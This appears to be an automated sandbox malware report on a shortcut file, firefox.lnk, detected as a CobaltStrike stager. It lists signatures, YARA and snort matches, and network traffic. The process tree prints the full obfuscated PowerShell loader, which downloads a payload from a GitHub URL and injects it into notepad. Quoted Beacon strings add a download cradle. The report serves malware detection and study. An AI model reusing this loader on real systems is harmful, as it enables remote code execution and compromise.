Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
firefox.lnk

Overview

General Information

Sample Name:firefox.lnk
Analysis ID:788724
MD5:e0c6b90b6436e492baa904698e281527
SHA1:3c05a31b00ebdce2c5bc5dfc150672928b9131fa
SHA256:b5403448598de334b4a94ed9ab9e14a9e22160753a73ae98fa81b9172a385414
Tags:lnkobfuscatedPowerShell
Infos:

Detection

CobaltStrike
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Windows shortcut file (LNK) starts blacklisted processes
Yara detected CobaltStrike
Snort IDS alert for network traffic
Compiles code for process injection (via .Net compiler)
.NET source code references suspicious native API functions
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$ZmvxyepEppsgI|,MrxTxv$e0$MrxTxv$f0$ymrx$g0$ymrx$h0$ymrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxiTvsgiwwQiqsv},MrxTxv$e0$MrxTxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$GviexiViqsxiXlvieh,MrxTxv$e0$MrxTxv$f0$ymrx$g0$MrxTxv$h0$MrxTxv$i0$ymrx$j0$syx$MrxTxv$k-?';Add-Type -Name y -names x -m $c;$h = [System.Diagnostics.Process]::GetProcessById((ps notepad).id[0]).Handle;$a = [x.y]::(/ 'ZmvxyepEppsgI|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxiTvsgiwwQiqsv}')($h, $a, $d, $d.Length, [ref] $n);[x.y]::(/ 'GviexiViqsxiXlvieh')($h, 0, 0, $a, 0, 0, [ref] $t); MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • csc.exe (PID: 6124 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • cvtres.exe (PID: 4180 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9A43.tmp" "c:\Users\user\AppData\Local\Temp\h4qpy1nu\CSCE97AB74AE4304D2FB93613F88A1756.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x4196d:$xs1: WS2_32.dll
  • 0x41f34:$xs2: ReflectiveLoader
sslproxydump.pcapCobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6gssincla@google.com
  • 0x1b4c5:$core_sig: C6 44 24 48 56 C6 44 24 49 69 C6 44 24 4A 72 C6 44 24 4B 74 C6 44 24 4C 75 C6 44 24 4D 61 C6 44 24 4E 6C C6 44 24 4F 41 C6 44 24 50 6C C6 44 24 51 6C C6 44 24 52 6F C6 44 24 53 63 C6 44 24 54 ...
  • 0x1aeef:$deobfuscator: 8B 04 24 FF C0 89 04 24 8B 44 24 28 39 04 24 73 20 8B 04 24 0F B6 4C 24 30 48 8B 54 24 20 0F BE 04 02 33 C1 8B 0C 24 48 8B 54 24 20 88 04 0A
sslproxydump.pcapCobaltbaltstrike_Beacon_x64Detects CobaltStrike payloadsAvast Threat Intel Team
  • 0x26bf:$h01: 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D EA FF FF FF 48 89
  • 0x442e7:$h13: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2E 7E 2E
sslproxydump.pcapMalware_QA_vqgkVT Research QA uploaded malware - file vqgk.dllFlorian Roth
  • 0x32ac4:$x3: %d is an x86 process (can't inject x64 content)
  • 0x32a94:$x4: %d is an x64 process (can't inject x86 content)
  • 0x32d3a:$s1: powershell -nop -exec bypass -EncodedCommand "%s"
  • 0x32436:$s2: Could not open process token: %d (%u)
  • 0x32e2b:$s5: Failed to impersonate logged on user %d (%u)
  • 0x32cf0:$s6: IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/'); %s
  • 0x329fb:$s7: could not write to process memory: %d
  • 0x3210d:$s8: beacon.dll
  • 0x32dd4:$s9: Failed to impersonate token from %d (%u)
sslproxydump.pcapTrojan_Raw_Generic_4unknownFireEye
  • 0x1bcc8:$s0: 83 C0 02 48 8B 7C 24 20 48 8B F0 B9 40 00 00 00 F3 A4 44 0F B6 84 24 A0 00 00 00 BA 40 00 00 00 48 8B 4C 24 20 E8 EF F2 FF FF 48 8B 54 24 20 48 8B 8C 24 98 00 00 00 48 8B 84 24 80 00 00 00 FF ...
  • 0x1af53:$s1: 0F B7 00 3D 4D 5A 00 00 75 45 48 8B 44 24 20 48 63 40 3C 48 89 44 24 28 48 83 7C 24 28 40 72 2F 48 81 7C 24 28 00 04 00 00 73 24 48 8B 44 24 20 48 8B 4C 24 28 48 03 C8 48 8B C1 48 89 44 24 28 ...
Click to see the 10 entries

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x613aa:$sa2: -EncodedCommand
  • 0x61386:$sc1: -nop
  • 0x61390:$se2: -exec bypass
  • 0x61390:$se4: -exec bypass
00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmpCobaltStrike_C2_Encoded_XOR_Config_IndicatorDetects CobaltStrike C2 encoded profile configurationyara@s3c.za.net
  • 0x568:$s046: 2E 2F 2E 2F 2E 2C 2E 26 2E 2C 2E 2F 2E 2C 2E 7E 2E 2D 2E 2C 2E 2A 2E 2E C4 4E 2E 2A 2E 2C 2E 2A 2E 3E 2E 2E 2E 2B 2E 2F 2E 2C 2E 2E
00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CobaltStrike_2Yara detected CobaltStrikeJoe Security
    00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CobaltStrikeYara detected CobaltStrikeJoe Security
        Click to see the 62 entries

        Sigma Signatures

        Data Obfuscation

        barindex
        Sigma detected: Dot net compiler compiles file from suspicious location
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function /{([int[]][char[]]$args[0]|%{[char]($_-4)})-join''};$c =/ '_HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$ZmvxyepEppsgI|,MrxTxv$e0$MrxTxv$f0$ymrx$g0$ymrx$h0$ymrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$fssp$[vmxiTvsgiwwQiqsv},MrxTxv$e0$MrxTxv$f0$f}xi_a$g0$ymrx$h0$syx$mrx$i-? _HppMqtsvx,&oivrip762hpp&-atyfpmg$wxexmg$i|xivr$MrxTxv$GviexiViqsxiXlvieh,MrxTxv$e0$MrxTxv$f0$ymrx$g0$MrxTxv$h0$MrxTxv$i0$ymrx$j0$syx$MrxTxv$k-?';Add-Type -Name y -names x -m $c;$h = [System.Diagnostics.Process]::GetProcessById((ps notepad).id[0]).Handle;$a = [x.y]::(/ 'ZmvxyepEppsgI|')($h, 0, 0x100000, 0x1000, 0x40);$d = (iwr github.com/john-xor/temp/blob/main/index.html?raw=true).content;$n = 0;$t = 0;[x.y]::(/ '[vmxiTvsgiwwQiqsv}')($h, $a, $d, $d.Length, [ref] $n);[x.y]::(/ 'GviexiViqsxiXlvieh')($h, 0, 0, $a, 0, 0, [ref] $t);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5336, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h4qpy1nu\h4qpy1nu.cmdline, ProcessId: 6124, ProcessName: csc.exe

        Snort Signatures

        Timestamp:185.199.108.133192.168.2.5443497042851878 01/21/23-01:14:27.101319
        SID:2851878
        Source Port:443
        Destination Port:49704
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49702 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49704 version: TLS 1.0
        Source: Binary string: e.pdb source: powershell.exe, 00000000.00000002.360991961.000001A63DCA1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb source: powershell.exe, 00000000.00000002.360991961.000001A63DBDB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: . .U.n.a.b.l.e. .t.o. .d.i.s.p.l.a.y. .R.T.C. .M.e.s.s.a.g.e.........R.u.n.-.T.i.m.e. .C.h.e.c.k. .F.a.i.l.u.r.e. .#.%.d. .-. .%.s...Unknown Filename........Unknown Module Name.....Run-Time Check Failure #%d - %s.Stack corrupted near unknown variable...p?.?....??.?....??.?....??.?.....?.?....Stack pointer corruption........Cast to smaller type causing loss of data.......Stack memory corruption.Local variable used before initialization.......Stack around _alloca corrupted..b.i.n.\.a.m.d.6.4.\.M.S.P.D.B.1.1.0...D.L.L.....RegOpenKeyExW...RegQueryValueExW........RegCloseKey.....S.O.F.T.W.A.R.E.\.W.o.w.6.4.3.2.N.o.d.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.1.1...0.\.S.e.t.u.p.\.V.C.......P.r.o.d.u.c.t.D.i.r.....PDBOpenValidate5....r...........???????????????????????????????????????????>????456789:;<=???????......... source: powershell.exe, 00000000.00000002.357207100.000001A635DC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635FDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635F4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2851878 ETPRO TROJAN Cobalt Strike Stager Payload 185.199.108.133:443 -> 192.168.2.5:49704
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/raw/main/index.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comCookie: _gh_sess=fb6TJ47A5BrqAuYq7xtaFuqWpH7VQEGHn7R2DM0HaSuWCZJLJWjyiNHiDwPIhOet1HmY15hHxFAptsqTyxWZ6048x%2F%2BzTz3WeNA5IP3w7%2FAPms%2FYJQHwAeVzYU%2BsYlTrwcL9dwbENMNHhaRTE08OQigvfaXVTMEoG%2FX051yu0lk5%2Fe1ctRFpHHw70HFCTlAIg1OBEnrm8I3X8%2BYVfiilz5KJ1HVLiEzuyspmhMzX6aQns69GYZjebwPCi66pUNIYu%2FWXnZAhKOYGv9PTz3fELA%3D%3D--sMySSnXnSldWPFRK--jfNtkM22fd04aSpsP%2F1NCw%3D%3D; _octo=GH1.1.69514824.1674260066; logged_in=no
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/main/index.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49702 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49704 version: TLS 1.0
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: powershell.exe, 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/
        Source: powershell.exe, 00000000.00000002.360991961.000001A63DBF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000000.00000002.323735392.000001A625DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627365000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
        Source: powershell.exe, 00000000.00000002.323735392.000001A625DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626933000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6272C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com/john-xor/temp/blob/main/index.html?raw=true
        Source: powershell.exe, 00000000.00000002.323735392.000001A6285C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
        Source: powershell.exe, 00000000.00000002.323735392.000001A625BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000000.00000002.323735392.000001A626D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
        Source: powershell.exe, 00000000.00000002.323735392.000001A6283B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6283FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000000.00000002.323735392.000001A626094000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627349000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A627352000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/john-xor/temp/blob/main/index.html?raw=true
        Source: powershell.exe, 00000000.00000002.323735392.000001A626D34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A6260C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/john-xor/temp/raw/main/index.html
        Source: powershell.exe, 00000000.00000002.323735392.000001A626094000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.comx
        Source: powershell.exe, 00000000.00000002.323735392.000001A6285C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
        Source: powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
        Source: powershell.exe, 00000000.00000002.323735392.000001A628376000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand
        Source: powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
        Source: powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000000.00000002.323735392.000001A626108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/john-xor/temp/main/index.html
        Source: powershell.exe, 00000000.00000002.323735392.000001A626108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comH
        Source: powershell.exe, 00000000.00000002.323735392.000001A626108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.323735392.000001A626D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://render.githubusercontent.com
        Source: unknownDNS traffic detected: queries for: github.com
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/raw/main/index.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comCookie: _gh_sess=fb6TJ47A5BrqAuYq7xtaFuqWpH7VQEGHn7R2DM0HaSuWCZJLJWjyiNHiDwPIhOet1HmY15hHxFAptsqTyxWZ6048x%2F%2BzTz3WeNA5IP3w7%2FAPms%2FYJQHwAeVzYU%2BsYlTrwcL9dwbENMNHhaRTE08OQigvfaXVTMEoG%2FX051yu0lk5%2Fe1ctRFpHHw70HFCTlAIg1OBEnrm8I3X8%2BYVfiilz5KJ1HVLiEzuyspmhMzX6aQns69GYZjebwPCi66pUNIYu%2FWXnZAhKOYGv9PTz3fELA%3D%3D--sMySSnXnSldWPFRK--jfNtkM22fd04aSpsP%2F1NCw%3D%3D; _octo=GH1.1.69514824.1674260066; logged_in=no
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/main/index.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /john-xor/temp/blob/main/index.html?raw=true HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.comConnection: Keep-Alive

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: sslproxydump.pcap, type: PCAPMatched rule: Trojan_Raw_Generic_4 Author: FireEye
        Source: sslproxydump.pcap, type: PCAPMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
        Source: sslproxydump.pcap, type: PCAPMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
        Source: sslproxydump.pcap, type: PCAPMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: sslproxydump.pcap, type: PCAPMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: sslproxydump.pcap, type: PCAPMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: sslproxydump.pcap, type: PCAPMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: 00000000.00000002.357207100.000001A635D88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.357207100.000001A635EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Trojan_Raw_Generic_4 Author: FireEye
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects CobaltStrike sleep_mask decoder Author: yara@s3c.za.net
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies CobaltStrike via unidentified function code Author: unknown
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon sleep obfuscation routine Author: unknown
        Source: 00000000.00000002.357207100.000001A635C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
        Source: Process Memory Space: powershell.exe PID: 5336, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
        Source: sslproxydump.pcap, type: PCAPMatched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, score = , reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, modified = 2022-12-23
        Source: sslproxydump.pcap, type: PCAPMatched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike\'s sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
        Source: sslproxydump.pcap, type: PCAPMatched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
        Source: sslproxydump.pcap, type: PCAPMatched rule: Malware_QA_vqgk date = 2016-08-29, author = Florian Roth, description = VT Research QA uploaded malware - file vqgk.dll, score = 99541ab28fc3328e25723607df4b0d9ea0a1af31b58e2da07eff9f15c4e6565c, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-12-21
